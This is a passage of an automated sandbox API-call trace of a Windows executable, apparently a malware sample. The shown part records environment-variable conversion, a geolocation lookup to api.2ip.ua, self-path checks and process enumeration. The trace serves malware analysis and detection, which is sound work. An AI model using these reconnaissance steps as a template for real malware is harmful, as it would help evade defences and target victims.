Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0075.811] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x7066c8 [0075.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x7066c8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0075.811] GetLastError () returned 0x0 [0075.811] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x4c [0075.812] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x50) returned 0x711218 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0075.812] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x711158 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x711158, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0075.812] GetLastError () returned 0x0 [0075.812] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x50 [0075.812] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x54) returned 0x711218 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0075.812] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x711178 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x711178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0075.812] GetLastError () returned 0x0 [0075.812] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x54 [0075.812] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x58) returned 0x711218 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0075.812] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x70e9d0 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x70e9d0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0075.812] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x58 [0075.812] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x5c) returned 0x711218 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0075.812] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70a580 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x70a580, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0075.812] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x5c [0075.812] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x60) returned 0x711218 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0075.812] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x70ac28 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x70ac28, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0075.812] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x60 [0075.812] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x64) returned 0x711218 [0075.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0075.813] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x70e9f8 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x70e9f8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0075.813] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x64 [0075.813] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x68) returned 0x711218 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0075.813] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x41) returned 0x706718 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x706718, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0075.813] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x68 [0075.813] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x6c) returned 0x711218 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0075.813] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x711290 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x711290, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0075.813] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x6c [0075.813] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x70) returned 0x711218 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0075.813] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xf) returned 0x70e1a0 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x70e1a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0075.813] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x70 [0075.813] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x74) returned 0x7112b0 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0075.813] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x16) returned 0x711218 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x711218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0075.813] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x74 [0075.813] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x78) returned 0x7112b0 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0075.813] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70ac60 [0075.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x70ac60, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0075.814] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x78 [0075.814] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x7c) returned 0x7112b0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0075.814] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x70ac98 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x70ac98, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0075.814] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x7c [0075.814] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x80) returned 0x7112b0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0075.814] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x15) returned 0x711238 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x711238, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0075.814] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x80 [0075.814] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x84) returned 0x7112b0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0075.814] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x70ea20 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70ea20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0075.814] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x84 [0075.814] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x88) returned 0x7112b0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0075.814] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70acd0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70acd0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0075.814] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x88 [0075.814] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x8c) returned 0x7112b0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0075.814] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x711258 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x711258, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0075.814] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x8c [0075.814] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x90) returned 0x7112b0 [0075.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0075.814] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x711348 [0075.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x711348, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0075.815] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112b0) returned 0x90 [0075.815] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112b0, Size=0x94) returned 0x711368 [0075.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0075.815] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x46) returned 0x706768 [0075.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x706768, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0075.815] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711368) returned 0x94 [0075.815] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711368, Size=0x98) returned 0x711368 [0075.873] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.873] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.873] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.883] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8ec) returned 0x711408 [0075.928] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.928] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x10) returned 0x70e1b8 [0075.929] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.929] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.929] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.993] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0076.016] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0080.144] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x40) returned 0x703f98 [0080.153] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0097.235] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b6e8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18dee8 | out: lpBuffer=0x18b6e8*, lpdwNumberOfBytesRead=0x18dee8*=0x1d1) returned 1 [0097.236] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0097.244] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71d300 [0097.266] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e0) returned 0x3316850 [0097.287] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3316850 | out: hHeap=0x6f0000) returned 1 [0097.297] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71d300 | out: hHeap=0x6f0000) returned 1 [0097.297] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x703f98 | out: hHeap=0x6f0000) returned 1 [0097.339] GetCurrentProcess () returned 0xffffffff [0097.339] GetLastError () returned 0x2 [0097.340] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x10) returned 0x742c10 [0097.359] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8ec) returned 0x330be98 [0097.369] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x800) returned 0x74c658 [0097.369] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x74c658, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe")) returned 0x36 [0097.369] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0097.378] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x810) returned 0x330c790 [0097.378] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" " [0097.378] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" ", pNumArgs=0x18dfc8 | out: pNumArgs=0x18dfc8) returned 0x744b80*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0097.378] lstrcpyW (in: lpString1=0x18ec58, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0097.399] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" " [0097.399] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" ", pNumArgs=0x18df64 | out: pNumArgs=0x18df64) returned 0x744b80*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0097.400] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned="YTHGRFED.EXE.exe" [0097.400] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0097.401] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcesses") returned 0x0 [0097.401] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcessModules") returned 0x0 [0097.401] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleBaseNameW") returned 0x0 [0097.401] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74fe0000 [0097.461] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcesses") returned 0x74fe1544 [0097.462] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0097.462] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameW") returned 0x74fe152c [0097.462] EnumProcesses (in: lpidProcess=0x183760, cb=0xa000, lpcbNeeded=0x18df70 | out: lpidProcess=0x183760, lpcbNeeded=0x18df70) returned 1 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0097.468] CloseHandle (hObject=0x0) returned 0 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0097.468] CloseHandle (hObject=0x0) returned 0 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0097.468] CloseHandle (hObject=0x0) returned 0 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0097.468] CloseHandle (hObject=0x0) returned 0 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0097.468] CloseHandle (hObject=0x0) returned 0 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0097.468] CloseHandle (hObject=0x0) returned 0 [0097.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0097.469] CloseHandle (hObject=0x0) returned 0 [0097.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0097.470] CloseHandle (hObject=0x0) returned 0 [0097.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0097.470] CloseHandle (hObject=0x0) returned 0 [0097.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0097.470] CloseHandle (hObject=0x0) returned 0 [0097.470] OpenProcess 